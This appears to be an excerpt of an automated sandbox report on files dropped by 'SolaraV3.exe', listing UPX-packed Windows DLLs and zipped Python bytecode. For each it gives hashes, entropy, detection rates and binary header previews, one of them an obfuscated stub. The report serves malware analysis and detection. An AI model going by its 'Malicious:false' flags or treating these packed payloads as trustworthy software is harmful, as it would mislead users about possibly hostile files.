                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......*..qn.."n.."n.."...#l.."g.."e.."n.."B.."<..#c.."<..#~.."<..#q.."<..#o.."<.g"o.."<..#o.."Richn.."................PE..d...%|.a.........." .........`......p................................................{....`A.........................................B..4....J...............p..X....X...'..........h,..T............................,..8............................................text............................... ..`.rdata...@.......B..................@..@.data...@....`.......@..............@....pdata..X....p.......D..............@..@_RDATA...............P..............@..@.rsrc................R..............@..@.reloc...............V..............@..B........................................................................................................................................................................................................................
                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\SolaraV3.exe
                                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):48920
                                                                                                                                                                                                                            Entropy (8bit):7.80237293184675
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:768:4AZgCxM2GXvgErzHwiVGP2lhBHgdcmQYnTYf9WeW/pAHILCVjew5YiSyv3YJPxWb:4A/MZJHzVGPwRHYTiWeWCHILCVjd7SyL
                                                                                                                                                                                                                            MD5:FBA120A94A072459011133DA3A989DB2
                                                                                                                                                                                                                            SHA1:6568B3E9E993C7E993A699505339BBEBB5DB6FB0
                                                                                                                                                                                                                            SHA-256:055A93C8B127DC840AC40CA70D4B0246AC88C9CDE1EF99267BBE904086E0B7D3
                                                                                                                                                                                                                            SHA-512:221B5A2A9DE1133E2866B39F493A822060D3FB85F8C844C116F64878B9B112E8085E61D450053D859A63450D1292C13BD7EC38B89FE2DFA6684AC94E090EC3AA
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........d.>...m...m...m.}<m...m.p.l...m.jRm...m.p.l...m.p.l...m.p.l...mup.l...m.}.l...m...m...mup.l...mup.l...mupPm...mup.l...mRich...m................PE..d.....,d.........." .................b....................................................`..........................................{..H....y.......p....... ..,............{.......................................n..8...........................................UPX0....................................UPX1................................@....rsrc........p......................@..............................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..
                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\SolaraV3.exe
                                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):59672
                                                                                                                                                                                                                            Entropy (8bit):7.815495306851539
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:1536:lAkx+GKRIxcWVGXWYOIDcPiBFCx/YzPILLPDM7SyGPxvI:ikx6uWX3xlBFCRYrILLPDMkxA
                                                                                                                                                                                                                            MD5:31859B9A99A29127C4236968B87DBCBB
                                                                                                                                                                                                                            SHA1:29B4EE82AA026C10FE8A4F43B40CBD8EC7EA71E5
                                                                                                                                                                                                                            SHA-256:644712C3475BE7F02C2493D75E6A831372D01243ACA61AA8A1418F57E6D0B713
                                                                                                                                                                                                                            SHA-512:FEC3AB9CE032E02C432D714DE0D764AAB83917129A5E6EECA21526B03176DA68DA08024D676BC0032200B2D2652E6D442CA2F1EF710A7408BD198995883A943A
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                            Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$............d...d...d.......d...e...d...a...d...`...d...g...d.d.e...d...`...d...e...d.:.e...d...e.I.d.d.i...d.d.d...d.d...d.d.f...d.Rich..d.........................PE..d.....,d.........." .............p...........................................@............`.........................................H<.......9.......0..........D............<.......................................%..8...........................................UPX0.....p..............................UPX1................................@....rsrc........0......................@..............................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..
                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\SolaraV3.exe
                                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):109336
                                                                                                                                                                                                                            Entropy (8bit):7.935778322595252
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:3072:bIUqPfSKN4sAaLojnvWxbpdNPyspILOqlJSgxDM:bllIMWxpdNP0J3M
                                                                                                                                                                                                                            MD5:7CDC590AC9B4FFA52C8223823B648E5C
                                                                                                                                                                                                                            SHA1:C8D9233ACBFF981D96C27F188FCDE0E98CDCB27C
                                                                                                                                                                                                                            SHA-256:F281BD8219B4B0655E9C3A5516FE0B36E44C28B0AC9170028DD052CA234C357C
                                                                                                                                                                                                                            SHA-512:919C36BE05F5F94EC84E68ECCA43C7D43ACB8137A043CF429A9E995643CA69C4C101775955E36C15F844F64FC303999DA0CBFE5E121EB5B3FFB7D70E3CD08E0B
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 3%
                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........76..VX..VX..VX.....VX..#Y..VX..#]..VX..#\..VX..#[..VX.t#Y..VX...Y..VX..VY.+VX.t#[..VX.t#U..VX.t#X..VX.t#...VX.t#Z..VX.Rich.VX.........................PE..d.....,d.........." .....p...................................................0............`..........................................,..P....)....... ...........'...........-..........................................8...........................................UPX0....................................UPX1.....p.......j..................@....rsrc........ .......n..............@......................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..
                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\SolaraV3.exe
                                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):36120
                                                                                                                                                                                                                            Entropy (8bit):7.666263818459696
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:768:ZkmOGHOaDC16x5fWN9/xx5qFp6OILOIeQ5YiSyv/UPxWElHBT:LfHOcCyO/Rq6OILOIeC7SyEPxDF
                                                                                                                                                                                                                            MD5:659A5EFA39A45C204ADA71E1660A7226
                                                                                                                                                                                                                            SHA1:1A347593FCA4F914CFC4231DC5F163AE6F6E9CE0
                                                                                                                                                                                                                            SHA-256:B16C0CC3BAA67246D8F44138C6105D66538E54D0AFB999F446CAE58AC83EF078
                                                                                                                                                                                                                            SHA-512:386626B3BAD58B450B8B97C6BA51CE87378CDDF7F574326625A03C239AA83C33F4D824D3B8856715F413CFB9238D23F802F598084DBD8C73C8F6C61275FDECB5
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........Q..b?..b?..b?......b?..>..b?..:..b?..;..b?..<..b?.2.>..b?..>..b?.7.>..b?..b>.pb?.2.2..b?.2.?..b?.2....b?.2.=..b?.Rich.b?.........PE..d.....,d.........." .....P.........../.......................................P............`..........................................K..P....I.......@.......................K.......................................;..8...........................................UPX0....................................UPX1.....P.......N..................@....rsrc........@.......R..............@......................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..
                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\SolaraV3.exe
                                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):87832
                                                                                                                                                                                                                            Entropy (8bit):7.91873819228598
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:1536:wZ6by758mldpnwpd+cjwZaO4jA5e0RBcS8iGyfowoQmXsoILZ14T7SyiPxq:O7HdSpd+co4AhRiXT8aILZ14TIxq
                                                                                                                                                                                                                            MD5:864B22495372FA4D8B18E1C535962AE2
                                                                                                                                                                                                                            SHA1:8CFAEE73B7690B9731303199E3ED187B1C046A85
                                                                                                                                                                                                                            SHA-256:FC57BD20B6B128AFA5FAAAC1FD0CE783031FAAF39F71B58C9CACF87A16F3325F
                                                                                                                                                                                                                            SHA-512:9F26FE88ACA42C80EB39153708B2315A4154204FC423CA474860072DD68CCC00B7081E8ADB87EF9A26B9F64CD2F4334F64BC2F732CD47E3F44F6CF9CC16FA187
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........l.M...M...M...D..I.......O.......F.......E.......N.......N.......O...M...(.......w.......L.......L.......L...RichM...................PE..d...&.,d.........." ..... ...............................................................`.........................................4...L....................@.........................................................8...........................................UPX0....................................UPX1..... ..........................@....rsrc...............................@......................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..
                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\SolaraV3.exe
                                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):26392
                                                                                                                                                                                                                            Entropy (8bit):7.451874097949462
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:768:9Oa1OtK/srvmpp1ILQUe+5YiSyvz5PxWEaAc:cMV/X1ILQUe07SydPxDc
                                                                                                                                                                                                                            MD5:BEBC7743E8AF7A812908FCB4CDD39168
                                                                                                                                                                                                                            SHA1:00E9056E76C3F9B2A9BABA683EAA52ECFA367EDB
                                                                                                                                                                                                                            SHA-256:CC275B2B053410C6391339149BAF5B58DF121A915D18B889F184BE02BEDAF9BC
                                                                                                                                                                                                                            SHA-512:C56496C6396B8C3EC5EC52542061B2146EA80D986DFE13B0D4FEB7B5953C80663E34CCD7B7EE99C4344352492BE93F7D31F7830EC9EC2CA8A0C2055CB18FA8DB
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........a............................................V...................V......V......V......V......Rich....................PE..d.....,d.........." .....0................................................................`.............................................L.......P............`..............<...........................................8...........................................UPX0....................................UPX1.....0.......(..................@....rsrc................,..............@......................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..
                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\SolaraV3.exe
                                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):43800
                                                                                                                                                                                                                            Entropy (8bit):7.716600949168409
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:768:Qp4KUJsCditRTPL/f9hpDd1ciTceZS/VgpjrpILLwjm/5YiSyv6PxWEads:QpghditRDL/1rcOcT/V4rpILLwjmx7Sd
                                                                                                                                                                                                                            MD5:49F87AEC74FEA76792972022F6715C4D
                                                                                                                                                                                                                            SHA1:ED1402BB0C80B36956EC9BAF750B96C7593911BD
                                                                                                                                                                                                                            SHA-256:5D8C8186DF42633679D6236C1FEBF93DB26405C1706F9B5D767FEAB440EA38B0
                                                                                                                                                                                                                            SHA-512:DE58D69228395827547E07695F70EF98CDAF041EBAAE0C3686246209254F0336A589B58D44B7776CCAE24A5BC03B9DC8354C768170B1771855F342EECC5FEAD4
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......~...:...:...:...3.i.<...h...8...h...6...h...2...h...9.......8...:.......q...=.......;.......;.......;.......;...Rich:...........PE..d.....,d.........." .....p...........k....................................................`.............................................P.......h............ ..<...........X........................................w..8...........................................UPX0....................................UPX1.....p.......j..................@....rsrc................n..............@..............................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..
                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\SolaraV3.exe
                                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):51480
                                                                                                                                                                                                                            Entropy (8bit):7.7600775531574655
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:1536:44+FRSaAh0lhSoqx1HuILOQzM7SywcPxC:4CMA0ILOQzMWMxC
                                                                                                                                                                                                                            MD5:70A7050387359A0FAB75B042256B371F
                                                                                                                                                                                                                            SHA1:5FFC6DFBADDB6829B1BFD478EFFB4917D42DFF85
                                                                                                                                                                                                                            SHA-256:E168A1E229F57248253EAD19F60802B25DC0DBC717C9776E157B8878D2CA4F3D
                                                                                                                                                                                                                            SHA-512:154FD26D4CA1E6A85E3B84CE9794A9D1EF6957C3BBA280D666686A0F14AA571AAEC20BAA0E869A78D4669F1F28EA333C0E9E4D3ECD51B25D34E46A0EF74EE735
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........V/\.8|\.8|\.8|U..|Z.8|..9}^.8|:..|].8|..=}P.8|..<}T.8|..;}_.8|..9}Y.8|..9}^.8|\.9|..8|..5}U.8|..8}].8|...|].8|..:}].8|Rich\.8|................PE..d...#.,d.........." .............@.......P................................................`.............................................P.......4............`..D...........(...........................................8...........................................UPX0.....@..............................UPX1.........P......................@....rsrc...............................@..............................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..
                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\SolaraV3.exe
                                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):63768
                                                                                                                                                                                                                            Entropy (8bit):7.844124998607476
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:1536:cww8TGrTNdinN5kuAQZMXb4zdILC74+67SykPx1:FPTGrTmN5kHQZMXc5ILC74Tax1
                                                                                                                                                                                                                            MD5:9A7AB96204E505C760921B98E259A572
                                                                                                                                                                                                                            SHA1:39226C222D3C439A03EAC8F72B527A7704124A87
                                                                                                                                                                                                                            SHA-256:CAE09BBBB12AA339FD9226698E7C7F003A26A95390C7DC3A2D71A1E540508644
                                                                                                                                                                                                                            SHA-512:0F5F58FB47379B829EE70C631B3E107CDE6A69DC64E4C993FB281F2D5ADA926405CE29EA8B1F4F87ED14610E18133932C7273A1AA209A0394CC6332F2ABA7E58
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........C.-...-...-.....-...,...-...(...-...)...-.......-.W.,...-.R.,...-...,...-...,...-.W. ...-.W.-...-.W....-.W./...-.Rich..-.................PE..d.....,d.........." ......................................................................`.........................................p...d....................P..........................................................8...........................................UPX0....................................UPX1................................@....rsrc...............................@..............................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..
                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\SolaraV3.exe
                                                                                                                                                                                                                            File Type:Zip archive data, at least v2.0 to extract, compression method=store
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):880569
                                                                                                                                                                                                                            Entropy (8bit):5.682988287908638
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:12288:lgYJu4KXWyBC6S4IEa8A4a2YWD3dOVwx/fpEWertSLMNE:lgYJiVBFLa2VIVwx/fpEWe+MNE
                                                                                                                                                                                                                            MD5:483D9675EF53A13327E7DFC7D09F23FE
                                                                                                                                                                                                                            SHA1:2378F1DB6292CD8DC4AD95763A42AD49AEB11337
                                                                                                                                                                                                                            SHA-256:70C28EC0770EDEFCEF46FA27AAA08BA8DC22A31ACD6F84CB0B99257DCA1B629E
                                                                                                                                                                                                                            SHA-512:F905EB1817D7D4CC1F65E3A5A01BADE761BCA15C4A24AF7097BC8F3F2B43B00E000D6EA23CD054C391D3FDC2F1114F2AF43C8BB6D97C1A0CE747763260A864F5
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                            Preview:PK..........!..^".5...5......._collections_abc.pyco....................................@.......d.Z.d.d.l.m.Z.m.Z...d.d.l.Z.e.e.e.....Z.e.d...Z.d.d...Z.e.e...Z.[.g.d...Z.d.Z.e.e.d.....Z.e.e.e.......Z.e.e.i.........Z.e.e.i.........Z.e.e.i.........Z.e.e.g.....Z.e.e.e.g.......Z.e.e.e.d.......Z.e.e.e.d.d.>.......Z.e.e.e.......Z.e.e.d.....Z e.e.d.....Z!e.e.e"......Z#e.i.......Z$e.i.......Z%e.i.......Z&e.e.j'..Z(e.d.d.......Z)d.d...Z*e*..Z*e.e*..Z+e*.,....[*d.d...Z-e-..Z-e.e-..Z.[-d.d...Z/G.d.d...d.e.d...Z0G.d.d...d.e.d...Z1G.d.d...d.e1..Z2e2.3e+....G.d.d...d.e.d...Z4G.d.d ..d e4..Z5G.d!d"..d"e5..Z6e6.3e.....G.d#d$..d$e.d...Z7G.d%d&..d&e7..Z8e8.3e.....e8.3e.....e8.3e.....e8.3e.....e8.3e.....e8.3e.....e8.3e.....e8.3e.....e8.3e.....e8.3e.....e8.3e ....e8.3e!....e8.3e#....G.d'd(..d(e7..Z9G.d)d*..d*e8..Z:e:.3e)....G.d+d,..d,e.d...Z;G.d-d...d.e.d...Z<G.d/d0..d0e;e7e<..Z=G.d1d2..d2e...Z>d3d4..Z?d5d6..Z@d7d8..ZAG.d9d:..d:e.d...ZBG.d;d<..d<e=..ZCeC.3eD....G.d=d>..d>eC..ZEeE.3e.....G.d?d@..d@e=..ZFeF
                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\SolaraV3.exe
                                                                                                                                                                                                                            File Type:Zip archive data, at least v2.0 to extract, compression method=store
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):80059
                                                                                                                                                                                                                            Entropy (8bit):7.83354552845193
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:1536:voYkuW1EFQ8d1xPG5e9qzEucyLNBw+v81iNRj4LYrmCaiGkbOBSzrNr+62:vQcFKe09XN6+2iL6qYGZk
                                                                                                                                                                                                                            MD5:2FCDAE27E8550D5159993C37A1A3ADD8
                                                                                                                                                                                                                            SHA1:D3EAC11B04BA62043E94D637B830AF21009FD309
                                                                                                                                                                                                                            SHA-256:7BCAE0D278321E777290953351C27571CC2272D563C5CEA6D34EBB0786ED10CE
                                                                                                                                                                                                                            SHA-512:6060482ADC1387CDEE2402BB57181FFD27049640CCD12046488546584F4639315C30579B9B794483A91BF95A2AB24C1B70AD0C7D83F02A6A12D914DF128F2CAE
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                            Preview:PK........s.<Y..2E8..E8......stub-o.pyco........Z.f&........................@...sl...e.e.e.e.g.d...........e.g.d...........e.g.d.............Z.e.e.e.e.g.d...........e.g.d...........e.g.d.............Z.e.e.e.e.g.d...........e.g.d...........e.g.d.............Z.e.e.e.e.g.d...........e.g.d...........e.g.d.............Z.d.d...Z.d.Z.e.e.e.e.e.g.d...........e.g.d...........e.g.d.............e.e.e.g.d...........e.g.d...........e.g.d.............e...Z.z.e.e.e.e.e.g.d...........e.g.d...........e.g.d.............e.e.e.g.d...........e.g.d...........e.g.d.............e.e.e.e.e.e.g.d...........e.g.d...........e.g.d.............e.e.e.g.d...........e.g.d...........e.g.d.............e.e...........pie.e.e.e.e.g.d...........e.g.d...........e.g.d.............e.e.e.g.d...........e.g.d...........e.g.d.............d.....W.nA..e.e.e.e.e.g.d...........e.g.d...........e.g.d.............e.e.e.g.d...........e.g.d...........e.g.d...............y.......Y.n.w.G.d.d...d...Z.d.S.)....b....a....s....e....6....4.....r.
                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\SolaraV3.exe
                                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):1112856
                                                                                                                                                                                                                            Entropy (8bit):7.937513332106868
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:24576:AfVpBeOErQiWG03fz7UuJ7G/y1Pcg8rWgrnNFF+EoIFAVMBU1CPwDv3uFfJN:4pBejNWGoXFJ7ay14rWgrnNxoIFAy+1Y
                                                                                                                                                                                                                            MD5:BBC1FCB5792F226C82E3E958948CB3C3
                                                                                                                                                                                                                            SHA1:4D25857BCF0651D90725D4FB8DB03CCADA6540C3
                                                                                                                                                                                                                            SHA-256:9A36E09F111687E6B450937BB9C8AEDE7C37D598B1CCCC1293EED2342D11CF47
                                                                                                                                                                                                                            SHA-512:3137BE91F3393DF2D56A3255281DB7D4A4DCCD6850EEB4F0DF69D4C8DDA625B85D5634FCE49B195F3CC431E2245B8E9BA401BAAA08778A467639EE4C1CC23D8D
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........].q...q...q....M..q.......q.......q.......q.......q...q..[q.......q.......q.......s.......q....!..q.......q..Rich.q..........................PE..d......c.........." ..."..........&..n5...&...................................7...........`......................................... .5.......5.h.....5.......2...............7......................................z5.@...........................................UPX0......&.............................UPX1..........&.....................@....rsrc.........5.....................@..............................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..
                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\SolaraV3.exe
                                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):24088
                                                                                                                                                                                                                            Entropy (8bit):7.527291720504194
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:384:hRZBxuj5W4IBzuU2CUvOEvba4Za7gJXkrZRCXEpnYPLxDG4y80uzFLhHj:rwlGuUm2Evb1p07pWDG4yKRF
                                                                                                                                                                                                                            MD5:6F818913FAFE8E4DF7FEDC46131F201F
                                                                                                                                                                                                                            SHA1:BBB7BA3EDBD4783F7F973D97B0B568CC69CADAC5
                                                                                                                                                                                                                            SHA-256:3F94EE4F23F6C7702AB0CC12995A6457BF22183FA828C30CC12288ADF153AE56
                                                                                                                                                                                                                            SHA-512:5473FE57DC40AF44EDB4F8A7EFD68C512784649D51B2045D570C7E49399990285B59CFA6BCD25EF1316E0A073EA2A89FE46BE3BFC33F05E3333037A1FD3A6639
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......6.3.r}]Ar}]Ar}]A{..Ap}]A .\@p}]A..\@q}]Ar}\AU}]A .X@~}]A .Y@z}]A .^@q}]A..Y@t}]A..^@s}]A..]@s}]A.._@s}]ARichr}]A........................PE..d......].........." .....@................................................................`.........................................................................................................................................................................UPX0....................................UPX1.....@.......:..................@...UPX2.................>..............@......................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..
                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\SolaraV3.exe
                                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):209688
                                                                                                                                                                                                                            Entropy (8bit):7.925861479415686
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:3072:He9fHP8SzrOGFIXkUNNlvBK8Tg111WMEGf0+fGYahm8YNIqepRLvwdlMrQk/OlfJ:+99u/XRxpK8M111nEE0iGYziqGdvwLeO
                                                                                                                                                                                                                            MD5:AD0A2B4286A43A0EF05F452667E656DB
                                                                                                                                                                                                                            SHA1:A8835CA75768B5756AA2445CA33B16E18CEACB77
                                                                                                                                                                                                                            SHA-256:2AF3D965863018C66C2A9A2D66072FE3657BBD0B900473B9BBDCAC8091686AE1
                                                                                                                                                                                                                            SHA-512:CCEB5EC1DD6D2801ABBACD6112393FECBF5D88FE52DB86CFC98F13326C3D3E31C042B0CC180B640D0F33681BDD9E6A355DC0FBFDE597A323C8D9E88DE40B37C4
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......u...1}q.1}q.1}q.8..=}q.~.p.3}q.z.p.3}q.~.t.=}q.~.u.9}q.~.r.5}q...p.2}q.1}p..|q...u..}q...q.0}q.....0}q...s.0}q.Rich1}q.........PE..d......c.........." ...".....P...`.......p................................................`..........................................6..4@...3.......0...........N...........v.......................................&..@...........................................UPX0.....`..............................UPX1.........p......................@....rsrc....P...0...H..................@..............................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..
                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\SolaraV3.exe
                                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):1514776
                                                                                                                                                                                                                            Entropy (8bit):7.99244120733247
                                                                                                                                                                                                                            Encrypted:true
                                                                                                                                                                                                                            SSDEEP:24576:AqrG9EWpLjdwiANNmpsWKCixQvvkZVqezQv4ivFf1BiuY1Gb+Dyl3/lJYjhYPkm9:A9xdvANw3J72q016ie6Ds/lJYjhq/
                                                                                                                                                                                                                            MD5:4A6AFA2200B1918C413D511C5A3C041C
                                                                                                                                                                                                                            SHA1:39CA3C2B669ADAC07D4A5EB1B3B79256CFE0C3B3
                                                                                                                                                                                                                            SHA-256:BEC187F608507B57CF0475971BA646B8AB42288AF8FDCF78BCE25F1D8C84B1DA
                                                                                                                                                                                                                            SHA-512:DBFFB06FFFF0542200344EA9863A44A6F1E1B783379E53DF18580E697E8204D3911E091DEB32A9C94B5599CDD54301B705B74E1F51104151CF13B89D57280A20
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........]...<...<...<...I...<...Sc..<...I...<...I...<...I...<...D...<...D...<...<...=..+I../<..+I...<..+Ia..<..+I...<..Rich.<..........................PE..d.....,d.........." ..... .......P/..jE..`/..................................`F...........`...........................................E.......E.d.....E......`B..............PF......................................vE.8...........................................UPX0.....P/.............................UPX1..... ...`/.....................@....rsrc.........E.....................@..............................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..
                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\SolaraV3.exe
                                                                                                                                                                                                                            File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):630736
                                                                                                                                                                                                                            Entropy (8bit):6.409476333013752
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:12288:3lPCcFDlj+gV4zOifKlOWVNcjfQww0S5JPgdbBC9qxbYG9Y:3lPCcvj+YYrfSOWVNcj1JS5JPgdbBCZd
                                                                                                                                                                                                                            MD5:9C223575AE5B9544BC3D69AC6364F75E
                                                                                                                                                                                                                            SHA1:8A1CB5EE02C742E937FEBC57609AC312247BA386
                                                                                                                                                                                                                            SHA-256:90341AC8DCC9EC5F9EFE89945A381EB701FE15C3196F594D9D9F0F67B4FC2213
                                                                                                                                                                                                                            SHA-512:57663E2C07B56024AAAE07515EE3A56B2F5068EBB2F2DC42BE95D1224376C2458DA21C965AAB6AE54DE780CB874C2FC9DE83D9089ABF4536DE0F50FACA582D09
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                            Reputation:unknown
